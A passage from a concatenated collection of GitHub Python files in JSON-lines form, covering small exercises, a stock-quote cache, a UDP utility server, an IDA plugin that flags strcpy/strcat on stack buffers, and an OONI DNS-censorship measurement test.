judges how quickly a person reacts.\n'''\n\nimport time\nimport random\n\nplay_it = raw_input('do you want to play it.(\\'y\\' or \\'n\\')')\nwhile play_it == \"y\":\n c = raw_input('input a character:\\n')\n i = random.randint(0,2**32) % 100\n print('please input number you guess:\\n')\n start = time.clock()\n guess = int(raw_input('input your guess:\\n'))\n while guess != i:\n if guess > i:\n print(\"Too big\")\n guess = int(raw_input('input your guess:\\n'))\n else:\n print('Too small')\n guess = int(raw_input('input your guess:\\n'))\n end = time.clock()\n b = time.time()\n\n var = (end - start) / 18.2\n print(end - start)\n\n if var < 15:\n print('you are very clever!')\n elif var < 25:\n print('you are normal!')\n else:\n print('you are stupid!')\n\n print('Congratulations')\n print('The number you guess is %d' %i)\n play_it = raw_input('do you want to play it.')","repo_name":"vekergu/ops_doc","sub_path":"learn_python/python练习100题/094-时间函数.py","file_name":"094-时间函数.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"34091006165","text":"from util.DateUtil import DateUtil\nfrom db.SqlExecutor import SqlExecutor\n\n\nclass HAVCache:\n def __init__(self):\n self.db = SqlExecutor(db_name='gpp-long-term.db')\n\n # check if we already have cached data for the provided date\n def has_data_for_date(self, ticker, date, no_update_if_today=False):\n found_date = self.get_last_retrieved(ticker)\n # if no found date, then it isn't in the cache at all\n if found_date is None:\n return False\n\n # found_date is Saturday or Sunday and is today, don't update cache\n if DateUtil.dates_match(date, found_date) and DateUtil.is_weekend(date) and DateUtil.is_today(date):\n return True\n\n # if the date is today and it isn't the weekend, we need to update our cache always\n if DateUtil.is_today(date) and not no_update_if_today:\n return False\n\n # if the date in the metadata is greater than the requested date\n # we already have data for this date, otherwise we need to go get it\n return found_date > date or (no_update_if_today and DateUtil.is_today(date))\n\n def store_result_meta_data(self, ticker, last_retrieved):\n found = self.get_last_retrieved(ticker)\n\n # if there's already a metadata record, just update it\n if found is not None:\n sql = 'UPDATE `HISTORIC_META_DATA` SET LAST_RETRIEVED=? WHERE TICKER=?'\n self.db.exec_insert(sql, (last_retrieved, ticker))\n else:\n sql = 'INSERT INTO `HISTORIC_META_DATA` (TICKER, LAST_RETRIEVED) VALUES (?, ?)'\n self.db.exec_insert(sql, (ticker, last_retrieved))\n\n def store_result_data(self, ticker, date, payload):\n sql = 'INSERT INTO `HISTORIC_DATA` (TICKER, DATE, OPEN, HIGH, LOW, CLOSE, VOLUME) ' \\\n 'VALUES(?, ?, ?, ?, ?, ?, ?)'\n\n # check to make sure we're not overwriting something\n data = self.get_daily_quote(ticker, date)\n if data is not None:\n self.db.exec_insert('DELETE FROM `HISTORIC_DATA` WHERE `TICKER`=? AND `DATE`=?', (ticker, date))\n\n to_send = (ticker, date)\n for item in payload:\n to_send = to_send + (item,)\n\n self.db.exec_insert(sql, to_send)\n\n # Checks whether a specific date is actually in the cache\n def check_cache(self, ticker, date):\n # don't try the DB before we know if the data will be there\n if not self.has_data_for_date(ticker, date):\n return None\n\n result = self.get_daily_quote(ticker, date)\n if result is None:\n return None\n\n return {'ticker': result[0], 'date': result[1], 'open': result[2],\n 'high': result[3], 'low': result[4], 'close': result[5], 'volume': result[6]}\n\n def get_last_retrieved(self, ticker):\n sql = 'SELECT * FROM `HISTORIC_META_DATA` WHERE TICKER=?'\n result = self.db.exec_select(sql, (ticker,)).fetchone()\n if result is None:\n return None\n\n found_timestamp = result[1]\n return found_timestamp\n\n def get_all_data(self, ticker):\n sql = 'SELECT * FROM `HISTORIC_DATA` WHERE TICKER=?'\n result = self.db.exec_select(sql, (ticker,)).fetchall()\n return result\n\n def get_rolling_window_quotes(self, ticker, end_date, num_desired):\n if not self.has_data_for_date(ticker, end_date, no_update_if_today=True):\n return None\n\n sql = 'SELECT * FROM `HISTORIC_DATA` WHERE TICKER=? AND DATE <= ? ORDER BY DATE DESC LIMIT ?'\n result = self.db.exec_select(sql, (ticker, end_date, num_desired)).fetchall()\n return result\n\n def get_daily_quote(self, ticker, date):\n sql = 'SELECT * FROM `HISTORIC_DATA` WHERE TICKER=? AND DATE=?'\n result = self.db.exec_select(sql, (ticker, date)).fetchone()\n return result\n\n def flush(self, ticker):\n sql = 'DELETE FROM `HISTORIC_DATA` WHERE TICKER=?'\n self.db.exec_insert(sql, (ticker,))\n","repo_name":"michaelalbinson/glowing-pancake-praw","sub_path":"api/alpha_vantage/HAVCache.py","file_name":"HAVCache.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
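A hypothetical call pattern for the cache above. The ticker, date, and payload values are invented for illustration, the fetch step is elided, and util.DateUtil/db.SqlExecutor are the project's own helpers:

cache = HAVCache()
ticker, date = "AAPL", "2020-01-02"   # hypothetical inputs

quote = cache.check_cache(ticker, date)
if quote is None:
    # Cache miss: fetch from the upstream API (not shown), then persist
    payload = (300.35, 300.58, 295.19, 297.43, 33870100)  # open/high/low/close/volume
    cache.store_result_data(ticker, date, payload)
    cache.store_result_meta_data(ticker, last_retrieved=date)
    quote = cache.check_cache(ticker, date)
print(quote["close"])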
{"seq_id":"38388983247","text":"def makeCodebook():\n decbook = {'5':'a', '2':'b', '#':'d', '8':'e', '1':'f', '3':'g', '4':'h', '6':'i', '0':'l', '9':'m','*':'n', '%':'o', '=':'p', '(':'r', ')':'s', ';':'t', '?':'u', '@':'v', ':':'y', '7':' '}\n encbook = {}\n \n for x in decbook : \n encbook[decbook[x]] = x\n\n return decbook, encbook\n\n# decbook = {'5':'a', '2':'b', '#':'d', '8':'e', '1':'f', '3':'g', '4':'h', '6':'i', '0':'l', '9':'m','*':'n', '%':'o', '=':'p', '(':'r', ')':'s', ';':'t', '?':'u', '@':'v', ':':'y', '7':' '}\ndef decode(inp, dec):\n \n for x in inp :\n # print(x)\n if x in dec :\n inp = inp.replace(x, dec[x])\n # print(inp)\n return inp\n\ndef encode(inp, enc):\n for x in inp :\n # print(x)\n if x in enc :\n inp = inp.replace(x, enc[x])\n # print(inp)\n return inp\n\n# def encode(input):\n# output = input\n# return output\n# inp = \"2222222222\"\n# for x in inp :\n# print(if x in decbook)\n\nif __name__ == \"__main__\":\n plaintext =\"this is my life hello hello world\" \n dec, enc =makeCodebook()\n enctext = encode(plaintext, enc)\n print(enctext)\n dectext = decode(enctext, dec)\n print(dectext)\n","repo_name":"ace2267/pythonExam","sub_path":"secureCode/1_encdecBookUtil.py","file_name":"1_encdecBookUtil.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"31069896813","text":"import socket\nimport random\nimport string\nfrom time import localtime, strftime\n\n# METHODS\n\n\"\"\" Method that returns the IP address of the given client.\n This method, like the PORTI method, takes the client's address as a\n parameter, which holds two values (the HOST and the PORT).\n\"\"\"\n\n\ndef IPADDRESS(address):\n return address[0]\n\n\ndef PORTI(address):\n return address[1]\n\n\ndef COUNT(text):\n text = text.lower()\n nrz = 0\n nrb = 0\n for x in text:\n if x == 'a' or x == 'e' or x == 'i' or x == 'u' or x == 'o':\n nrz += 1\n elif x >= 'a' and x <= 'z':\n nrb += 1\n final = \"The received text contains \" + str(nrz) + \" vowels and \" + str(nrb) + \" consonants.\"\n return final\n\n\ndef REVERSE(text):\n backw = \"\"\n gjatesia = len(text)\n for x in range(gjatesia):\n backw += text[gjatesia - 1]\n gjatesia -= 1\n return backw.strip() # returns the reversed text with leading and trailing whitespace removed\n\n\n# Takes a sentence and reports whether it is a palindrome (True) or not (False)\n\ndef PALINDROME(text):\n backw = \"\"\n gjatesia = len(text)\n for x in range(gjatesia):\n backw += text[gjatesia - 1]\n gjatesia -= 1\n if text == backw:\n return str(True)\n else:\n return str(False)\n\n\ndef TIME():\n return strftime(\"%Y-%m-%d %H:%M:%S PM\", localtime())\n\n\ndef GAME():\n lista = []\n\n while len(lista) != 5:\n y = random.randint(1, 36)\n if y not in lista:\n lista.append(y)\n\n listToStr = ', '.join([str(elem) for elem in lista])\n return listToStr\n\n\ndef CONVERT(number, option):\n if option == \"CMTOFEET\":\n return str(round((number * 0.0328084), 2)) + \"ft\"\n elif option == \"FEETTOCM\":\n return str(round((number / 0.0328084), 2)) + \"cm\"\n elif option == \"KMTOMILES\":\n return str(round((number * 0.621371), 2)) + \"miles\"\n elif option == \"MILESTOKM\":\n return str(round((number / 0.621371), 2)) + \"km\"\n else:\n return \"Invalid option chosen.\"\n\n\ndef GCF(x, y):\n while y != 0:\n (x, y) = (y, x % y)\n return str(x)\n\n\ndef CALCULATE(x, op,\n *n): # *n means the arguments after x and op are optional, because CALCULATE has operations that do not need a third argument\n x = float(x)\n if len(n) > 1:\n return (\"CALCULATE accepts only three arguments.\")\n pass\n y = 0\n for nr in n:\n y = float(nr)\n if op == \"SQRT\":\n return round((x ** (1 / 2)), 2)\n elif op == \"%\":\n return (x * (0.01) * y)\n elif op == \"+\":\n return x + y\n elif op == \"-\":\n return x - y\n elif op == \"*\":\n return x * y\n elif op == \"/\":\n return x / y\n elif op == \"^\":\n return x ** y\n\n\ndef password(gjatesia):\n gjatesia = int(gjatesia)\n chars = string.ascii_letters + string.digits + string.punctuation\n lista = []\n for x in range(gjatesia):\n lista.append(random.choice(chars))\n return ''.join(lista)\n\n\n# ----------------------------------------------------------------------------------------\n\n\n# SOCKET\n\ntry:\n HOST = 'localhost'\n PORT = 13000\n UDPserver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n print(\"Socket is being created...\")\nexcept socket.error as err:\n print(\"Error while creating socket\", err)\n\n\n
Error: \", err)\n print(\"\\nKontrolloni IP adresen dhe PORTIN qe e keni dhene.\\n\")\n HOST = input(\"Jepni IP adresen perseri: \")\n try:\n PORT = int(input(\"Jepni PORTin perseri: \"))\n except (ValueError, OverflowError):\n PORT = int(input(\"Ju lutem sigurohuni qe PORT te jete nje numer (1024 - 65535): \"))\n socketBinding()\n\n\nsocketBinding()\n\nwhile True:\n try:\n dataRecieved, address = UDPserver.recvfrom(128)\n data = dataRecieved.decode()\n data = data.upper()\n print(\"\\nKerkesa nga klienti me IP: '\" + str(address[0]) + \"', dhe Port: \" + str(address[1]) + \"\\n\" + data)\n\n args = data.split()\n gjatesia = len(args)\n kerkesa = args[0]\n\n if kerkesa == \"TEST\":\n continue\n elif kerkesa == \"IPADDRESS\":\n pergjigjja = \"IP Adresa e klientit eshte: \" + str(IPADDRESS(address))\n UDPserver.sendto(pergjigjja.encode(), address)\n elif kerkesa == \"PORT\":\n pergjigjja = \"Klienti eshte duke perdorur portin: \" + str(PORTI(address))\n UDPserver.sendto(pergjigjja.encode(), address)\n elif kerkesa == \"TIME\":\n UDPserver.sendto(str(TIME()).encode(), address)\n elif kerkesa == \"GAME\":\n UDPserver.sendto(GAME().encode(), address)\n elif kerkesa == \"EXIT\":\n print(\"Lidhja me klientin eshte shkeputur.\")\n continue\n elif kerkesa == \"COUNT\":\n text = data[len(kerkesa):]\n UDPserver.sendto(COUNT(text).encode(), address)\n elif kerkesa == \"REVERSE\":\n text = data[len(kerkesa):]\n UDPserver.sendto(REVERSE(text).encode(), address)\n elif kerkesa == \"PALINDROME\":\n text = args[1]\n UDPserver.sendto(PALINDROME(text).encode(), address)\n elif kerkesa == \"CONVERT\":\n number = float(args[1])\n option = args[2]\n UDPserver.sendto(CONVERT(number, option).encode(), address)\n elif kerkesa == \"GCF\":\n x = (int)(args[1])\n y = (int)(args[2])\n UDPserver.sendto(GCF(x, y).encode(), address)\n elif kerkesa == \"CALCULATE\":\n x = args[1]\n op = args[2]\n if gjatesia > 3: # kjo eshte bere per shkak se sqrt kerkon vetem nje numer dhe operatorin\n y = args[3]\n UDPserver.sendto(str(CALCULATE(x, op, y)).encode(), address)\n elif gjatesia == 3:\n UDPserver.sendto(str(CALCULATE(x, op)).encode(), address)\n elif kerkesa == \"PASSWORD\":\n gjatesia = args[1]\n UDPserver.sendto(str(password(gjatesia)).encode(), address)\n except (ConnectionError, ConnectionRefusedError, ConnectionAbortedError, ConnectionResetError) as err:\n print(\"Server side error... 
\", err)\n","repo_name":"ylber-gashi/Socket-Programming-with-Python","sub_path":"FIEK UDP/FIEK_UDP_Server.py","file_name":"FIEK_UDP_Server.py","file_ext":"py","file_size_in_byte":6560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30341598147","text":"import unittest\n\nfrom pandas import DataFrame\n\nfrom materialscoord.plot import plot_benchmark_scores\n\n\nclass PlotTest(unittest.TestCase):\n \"\"\"Test plotting functions.\"\"\"\n\n def test_plot(self):\n \"\"\"Simple test to check the plot function doesn't error.\"\"\"\n data = {\n \"EconNN\": {\"test_structure\": 2.0, \"Total\": 2.0},\n \"MinimumVIRENN\": {\"test_structure\": 2.0, \"Total\": 2.0},\n }\n scores = DataFrame(data=data)\n plt = plot_benchmark_scores(scores)\n self.assertNotEqual(plt, None)\n","repo_name":"hackingmaterials/materials-coord","sub_path":"materialscoord/tests/test_plot.py","file_name":"test_plot.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"73216241449","text":"'''从staple和drinks中各选一个数,和不超过x,共有多少选法 (mod 1000000007)'''\nfrom typing import List\nclass Solution:\n def breakfastNumber(self, staple: List[int], drinks: List[int], x: int) -> int:\n staple.sort()\n drinks.sort()\n ns, nd = len(staple), len(drinks)\n ks, kd = 0, nd - 1\n res = 0\n while ks < ns and kd >= 0 :\n while kd >=0 and staple[ks] + drinks[kd] > x :\n kd -= 1\n res = (res + (kd + 1)) % 1000000007\n ks += 1\n return res\n\n\nstaple = [2,1,1]\ndrinks = [9,8,5,1]\nx = 9\nprint(Solution().breakfastNumber(staple, drinks, x))\n\n","repo_name":"pwl607/LeetCodeSolutions","sub_path":"LCP 18. 早餐组合.py","file_name":"LCP 18. 早餐组合.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20017213950","text":"from idaapi import *\nfrom idc import *\nfrom idautils import *\n\n\n# 动态获取cpu位数\ndef get_arch_dynamic():\n idainfo = get_inf_structure()\n if idainfo.is_64bit():\n return 64\n elif idainfo.is_32bit():\n return 32\n else:\n return 0\n\n# 获取函数的可引用地址\n\n\ndef GetFuncAddr(func):\n addr = get_name_ea_simple(func)\n if addr == BADADDR:\n return addr\n segm = get_segm_name(addr)\n if segm == \"extern\":\n # extern地址交叉引用地址属于.got.plt或.got\n addr = get_first_dref_to(addr)\n if addr != BADADDR:\n segm = get_segm_name(addr)\n if segm not in [\".got.plt\", \".got\"]:\n return BADADDR\n # got表的交叉引用地址在plt段\n addr = get_first_dref_to(addr)\n if addr != BADADDR:\n segm = get_segm_name(addr)\n if segm != \".plt\":\n return BADADDR\n elif segm != \".text\":\n addr = BADADDR\n return addr\n\n# 判断栈的大小是否足够大\n\n\ndef frame_size(func):\n # 可能出现栈溢出的变量大小,最小阈值\n minsize = 16\n # 遍历所有函数\n flags = get_func_attr(func, FUNCATTR_FLAGS)\n if not (flags & FUNC_FRAME):\n return -1\n prev_count = -1\n frame_counter = 0\n prev_var = None\n stack_frame = get_func_attr(func, FUNCATTR_FRAME)\n if stack_frame == -1:\n return -1\n # 获取栈的大小\n frame_size = get_struc_size(stack_frame)\n print(\"[*] function address : %s, frame_size: %d\" %\n (hex(func), frame_size))\n if stack_frame < minsize:\n return -1\n # 遍历每个变量,将足够大的变量打印出来\n flag = 0\n while frame_counter < frame_size:\n stack_var = get_member_name(stack_frame, frame_counter)\n if stack_var is not None:\n if prev_count != -1:\n member_size = frame_counter - prev_count\n if member_size >= minsize:\n print(\"[*] function name : %s -> stack variable: %s (%d bytes)\" %\n 
{"seq_id":"20017213950","text":"from idaapi import *\nfrom idc import *\nfrom idautils import *\n\n\n# Dynamically determine the CPU bitness\ndef get_arch_dynamic():\n idainfo = get_inf_structure()\n if idainfo.is_64bit():\n return 64\n elif idainfo.is_32bit():\n return 32\n else:\n return 0\n\n# Get a referenceable address for a function\n\n\ndef GetFuncAddr(func):\n addr = get_name_ea_simple(func)\n if addr == BADADDR:\n return addr\n segm = get_segm_name(addr)\n if segm == \"extern\":\n # cross-references of an extern address belong to .got.plt or .got\n addr = get_first_dref_to(addr)\n if addr != BADADDR:\n segm = get_segm_name(addr)\n if segm not in [\".got.plt\", \".got\"]:\n return BADADDR\n # cross-references of the GOT entry are in the .plt segment\n addr = get_first_dref_to(addr)\n if addr != BADADDR:\n segm = get_segm_name(addr)\n if segm != \".plt\":\n return BADADDR\n elif segm != \".text\":\n addr = BADADDR\n return addr\n\n# Check whether the stack frame is large enough\n\n\ndef frame_size(func):\n # minimum size threshold for a variable that could be overflowed\n minsize = 16\n flags = get_func_attr(func, FUNCATTR_FLAGS)\n if not (flags & FUNC_FRAME):\n return -1\n prev_count = -1\n frame_counter = 0\n prev_var = None\n stack_frame = get_func_attr(func, FUNCATTR_FRAME)\n if stack_frame == -1:\n return -1\n # get the frame size\n frame_size = get_struc_size(stack_frame)\n print(\"[*] function address : %s, frame_size: %d\" %\n (hex(func), frame_size))\n if frame_size < minsize:\n return -1\n # iterate over each stack variable and print the ones that are large enough\n flag = 0\n while frame_counter < frame_size:\n stack_var = get_member_name(stack_frame, frame_counter)\n if stack_var is not None:\n if prev_count != -1:\n member_size = frame_counter - prev_count\n if member_size >= minsize:\n print(\"[*] function name : %s -> stack variable: %s (%d bytes)\" % (get_func_name(func), prev_var, member_size))\n flag = 1\n prev_count = frame_counter\n prev_var = stack_var\n frame_counter += get_member_size(stack_frame, frame_counter)\n else:\n frame_counter = frame_counter + 1\n if flag == 1:\n return 1\n return -1\n\n\ndef get_arg(addr, arg_num, bits):\n # 64-bit argument-passing registers\n if(\"ELF\" in get_file_type_name()):\n arg_list_x64 = [\"rdi\", \"rsi\", \"rdx\", \"rcx\", \"r8\", \"r9\"]\n arg_list_x64_2 = [\"edi\", \"esi\", \"edx\", \"ecx\", \"r8\", \"r9\"]\n elif(\"PE\" in get_file_type_name()):\n arg_list_x64 = [\"rcx\", \"rdx\", \"r8\", \"r9\"]\n arg_list_x64_2 = [\"ecx\", \"edx\", \"r8\", \"r9\"]\n\n func_start = get_func_attr(addr, FUNCATTR_START)\n arg_count = -1\n while True:\n # walk backwards through the instructions\n addr = prev_head(addr)\n # get the instruction mnemonic\n mnem = print_insn_mnem(addr)\n if mnem in (\"ret\", \"retn\", \"jmp\", \"b\") or addr < func_start:\n return -1\n # extract the requested argument\n if bits == 32:\n if mnem == \"push\":\n arg_count += 1\n if arg_count == arg_num:\n return print_operand(addr, 0)\n elif mnem in [\"mov\", \"lea\"]:\n if \"[esp]\" in print_operand(addr, 0):\n arg_count += 1\n if arg_count == arg_num:\n return print_operand(addr, 1)\n elif bits == 64:\n if mnem in [\"mov\", \"lea\"]:\n if print_operand(addr, 0) in [arg_list_x64[arg_num], arg_list_x64_2[arg_num]]:\n return print_operand(addr, 1)\n\n\n# Check whether an operand is a stack variable\ndef is_stack_buffer(addr, idx):\n inst = DecodeInstruction(addr)\n ret = get_stkvar(inst, inst[idx], inst[idx].addr)\n return ret\n\n# Detect inlined strcpy and strcat\n\n\ndef inline_strcpy(bits):\n ea = 0\n while ea != BADADDR:\n addr = find_text(ea+2, SEARCH_DOWN | SEARCH_NEXT, 0, 0, \"rep movsd\")\n ea = addr\n # rep movsd immediately followed by rep movsb\n if \"movsb\" in GetDisasm(addr+7):\n opnd = \"edi\"\n if bits == 64:\n opnd = \"rdi\"\n func_start = get_func_attr(addr, FUNCATTR_START)\n if frame_size(func_start) < 0:\n continue\n _addr = addr\n while True:\n _addr = prev_head(_addr)\n mnem = print_insn_mnem(_addr)\n operand = print_operand(_addr, 0)\n if mnem in (\"ret\", \"retn\", \"jmp\", \"b\") or _addr < func_start:\n break\n elif mnem == \"lea\" and operand == opnd:\n if is_stack_buffer(_addr, 1):\n print(\"[!] stack buffer strcpy found at \", hex(addr))\n break\n else:\n break\n elif mnem == \"mov\" and operand == opnd:\n op_type = get_operand_type(_addr, 1)\n if op_type == o_reg:\n opnd = print_operand(_addr, 1)\n addr = _addr\n else:\n break\n\n\n# Main routine for detecting buffer overflows\ndef check_stack(bits):\n if bits not in [32, 64]:\n print(\"unknown bits\")\n return\n # dangerous buffer-overflow functions\n danger_funcs = {\n \"strcpy\": 0,\n \"strcat\": 0\n }\n func_no_count = 0\n for func, arg_num in danger_funcs.items():\n addr = GetFuncAddr(func)\n if addr == BADADDR:\n func_no_count += 1\n if func_no_count == len(danger_funcs):\n print(\n \"[*] This file does not call any known buffer overflow hazard functions!\")\n continue\n print(\"[*] %s Referenceable address %s\" % (func, hex(addr)))\n xrefs = CodeRefsTo(addr, 0)\n for ref in xrefs:\n print(\"[+]\", hex(ref), GetDisasm(ref))\n func_start = get_func_attr(ref, FUNCATTR_START)\n if frame_size(func_start) < 0:\n continue\n opnd = get_arg(ref, arg_num, bits)\n if opnd == -1:\n continue\n addr = ref\n while True:\n addr = prev_head(addr)\n mnem = print_insn_mnem(addr)\n operand = print_operand(addr, 0)\n if mnem in (\"ret\", \"retn\", \"jmp\", \"b\") or addr < func_start:\n break\n elif mnem == \"lea\":\n if (operand == opnd or (operand[1:] == opnd[1:] and operand[0] in ['r', 'e'] and opnd[0] in ['r', 'e'])):\n if is_stack_buffer(addr, 1):\n print(\"[!] 
stack buffer strcpy found at \", hex(addr))\n break\n elif mnem == \"mov\":\n if (operand == opnd or (operand[1:] == opnd[1:] and operand[0] in ['r', 'e'] and opnd[0] in ['r', 'e'])):\n op_type = get_operand_type(addr, 1)\n if op_type == o_reg:\n opnd = print_operand(addr, 1)\n else:\n break\n\n\nclass buffer_overflows(plugin_t):\n flags = PLUGIN_UNL\n comment = \"\"\n help = \"This plugin can check for buffer overflow dangerous functions.\"\n wanted_name = \"Buffer Overflow Functions\"\n wanted_hotkey = \"\"\n\n def init(self):\n return PLUGIN_OK\n\n def run(self, arg):\n print(\"===================================================================\")\n check_stack(get_arch_dynamic())\n\n def term(self):\n pass\n\n\ndef PLUGIN_ENTRY():\n return buffer_overflows()\n","repo_name":"hqz66/IDA_Vulnerability_Detection","sub_path":"buffer_overflows.py","file_name":"buffer_overflows.py","file_ext":"py","file_size_in_byte":7742,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"17544490737","text":"import setuptools\n\nwith open('README.md') as fl:\n l_desc = fl.read()\n\nsetuptools.setup(\n name=\"pyNetSocket\",\n version=\"1.1.5\",\n author=\"AdityaIyer2k7\",\n author_email=\"adityaiyer2007@gmail.com\",\n description=\"A simple networking library for python\",\n long_description=l_desc,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/DrSparky2k7/PyNetSocket\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n keywords=[\n 'networking',\n 'sockets',\n 'simple networking',\n 'simple sockets',\n 'pyNetSockets',\n 'pyNetSocket'\n ],\n python_requires='>=3.6'\n)\n","repo_name":"AdityaIyer2k7/pyNetSocket","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7577408525","text":"# -*- encoding: utf-8 -*-\n#\n# dnsconsistency\n# **************\n#\n# The test reports censorship if the cardinality of the intersection of\n# the query result set from the control server and the query result set\n# from the experimental server is zero, which is to say, if the two sets\n# have no matching results whatsoever.\n#\n# NOTE: This test frequently results in false positives due to GeoIP-based\n# load balancing on major global sites such as google, facebook, and\n# youtube, etc.\n#\n# :authors: Arturo Filastò, Isis Lovecruft\n# :licence: see LICENSE\n\n\nfrom twisted.python import usage\nfrom twisted.internet import defer\n\nfrom ooni.templates import dnst\n\nfrom ooni.utils import log\n\n\nclass UsageOptions(usage.Options):\n optParameters = [['backend', 'b', None,\n 'The OONI backend that runs the DNS resolver.'],\n ['testresolvers', 'T', None,\n 'File containing list of DNS resolvers to test against.'],\n ['testresolver', 't', None,\n 'Specify a single test resolver to use for testing.']\n ]\n\n\nclass DNSConsistencyTest(dnst.DNSTest):\n\n name = \"DNS Consistency\"\n description = \"Checks to see if the DNS responses from a \"\\\n \"set of DNS resolvers are consistent.\"\n version = \"0.7.0\"\n authors = \"Arturo Filastò, Isis Lovecruft\"\n\n inputFile = ['file', 'f', None,\n 'Input file of list of hostnames to attempt to resolve']\n\n requiredTestHelpers = {'backend': 'dns'}\n requiresRoot = False\n requiresTor = False\n\n usageOptions = 
UsageOptions\n requiredOptions = ['backend', 'file']\n\n def setUp(self):\n if (not self.localOptions['testresolvers'] and\n not self.localOptions['testresolver']):\n self.test_resolvers = []\n with open('/etc/resolv.conf') as f:\n for line in f:\n if line.startswith('nameserver'):\n self.test_resolvers.append(line.split(' ')[1].strip())\n self.report['test_resolvers'] = self.test_resolvers\n\n elif self.localOptions['testresolvers']:\n test_resolvers_file = self.localOptions['testresolvers']\n\n elif self.localOptions['testresolver']:\n self.test_resolvers = [self.localOptions['testresolver']]\n\n try:\n with open(test_resolvers_file) as f:\n self.test_resolvers = [\n x.split('#')[0].strip() for x in f.readlines()]\n self.report['test_resolvers'] = self.test_resolvers\n f.close()\n\n except IOError as e:\n log.exception(e)\n raise usage.UsageError(\"Invalid test resolvers file\")\n\n except NameError:\n log.debug(\"No test resolver file configured\")\n\n dns_ip, dns_port = self.localOptions['backend'].split(':')\n self.control_dns_server = (str(dns_ip), int(dns_port))\n\n self.report['control_resolver'] = \"%s:%d\" % self.control_dns_server\n\n @defer.inlineCallbacks\n def test_a_lookup(self):\n \"\"\"\n We perform an A lookup on the DNS test servers for the domains to be\n tested and an A lookup on the known good DNS server.\n\n We then compare the results from test_resolvers and that from\n control_resolver and see if they match up.\n If they match up then no censorship is happening (tampering: false).\n\n If they do not we do a reverse lookup (PTR) on the test_resolvers and\n the control resolver for every IP address we got back and check to see\n if anyone of them matches the control ones.\n\n If they do, then we take note of the fact that censorship is probably\n not happening (tampering: reverse-match).\n\n If they do not match then censorship is probably going on (tampering:\n true).\n \"\"\"\n log.msg(\"Doing the test lookups on %s\" % self.input)\n hostname = self.input\n\n self.report['successful'] = []\n self.report['failures'] = []\n self.report['inconsistent'] = []\n\n self.report['errors'] = {}\n\n try:\n control_answers = yield self.performALookup(hostname,\n self.control_dns_server)\n\n if not control_answers:\n log.err(\n \"Got no response from control DNS server %s:%d, \"\n \"perhaps the DNS resolver is down?\" %\n self.control_dns_server)\n self.report['errors'][\n \"%s:%d\" %\n self.control_dns_server] = 'no_answer'\n except:\n self.report['errors'][\n \"%s:%d\" %\n self.control_dns_server] = 'error'\n control_answers = None\n\n for test_resolver in self.test_resolvers:\n log.msg(\"Testing resolver: %s\" % test_resolver)\n test_dns_server = (test_resolver, 53)\n\n try:\n experiment_answers = yield self.performALookup(hostname,\n test_dns_server)\n except Exception:\n log.err(\"Problem performing the DNS lookup\")\n self.report['errors'][test_resolver] = 'dns_lookup_error'\n self.report['failures'].append(test_resolver)\n continue\n\n if not experiment_answers:\n log.err(\"Got no response, perhaps the DNS resolver is down?\")\n self.report['errors'][test_resolver] = 'no_answer'\n self.report['failures'].append(test_resolver)\n continue\n else:\n log.debug(\n \"Got the following A lookup answers %s from %s\" %\n (experiment_answers, test_resolver))\n\n def lookup_details():\n \"\"\"\n A closure useful for printing test details.\n \"\"\"\n log.msg(\"test resolver: %s\" % test_resolver)\n log.msg(\"experiment answers: %s\" % experiment_answers)\n log.msg(\"control answers: 
%s\" % control_answers)\n\n log.debug(\n \"Comparing %s with %s\" %\n (experiment_answers, control_answers))\n\n if not control_answers:\n log.msg(\"Skipping control resolver comparison\")\n self.report['errors'][test_resolver] = None\n\n elif set(experiment_answers) & set(control_answers):\n lookup_details()\n log.msg(\"tampering: false\")\n self.report['errors'][test_resolver] = False\n self.report['successful'].append(test_resolver)\n else:\n log.msg(\"Trying to do reverse lookup\")\n experiment_reverse = yield self.performPTRLookup(experiment_answers[0],\n test_dns_server)\n control_reverse = yield self.performPTRLookup(control_answers[0],\n self.control_dns_server)\n\n if experiment_reverse == control_reverse:\n log.msg(\"Further testing has eliminated false positives\")\n lookup_details()\n log.msg(\"tampering: reverse_match\")\n self.report['errors'][test_resolver] = 'reverse_match'\n self.report['successful'].append(test_resolver)\n else:\n log.msg(\"Reverse lookups do not match\")\n lookup_details()\n log.msg(\"tampering: true\")\n self.report['errors'][test_resolver] = True\n self.report['inconsistent'].append(test_resolver)\n\n def inputProcessor(self, filename=None):\n \"\"\"\n This inputProcessor extracts domain names from urls\n \"\"\"\n log.debug(\"Running dnsconsistency default processor\")\n if filename:\n fp = open(filename)\n for x in fp.readlines():\n yield x.strip().split('//')[-1].split('/')[0]\n fp.close()\n else:\n pass\n","repo_name":"ooni/probe-legacy","sub_path":"ooni/nettests/blocking/dns_consistency.py","file_name":"dns_consistency.py","file_ext":"py","file_size_in_byte":8208,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"34903596043","text":"#!/usr/bin/env python\n\"\"\"mirror_client.py - Clinet for oVirt CI transactional mirrors\n\"\"\"\nfrom six.moves import StringIO, range\nfrom six.moves.configparser import RawConfigParser\nfrom six.moves.urllib.parse import urlparse, urljoin\nfrom six import MAXSIZE, iteritems, string_types\nimport requests\nfrom requests.exceptions import ConnectionError, Timeout\nfrom os import environ\nimport glob\nimport logging\nimport yaml\nimport re\nfrom collections import Mapping\nfrom time import sleep\nimport 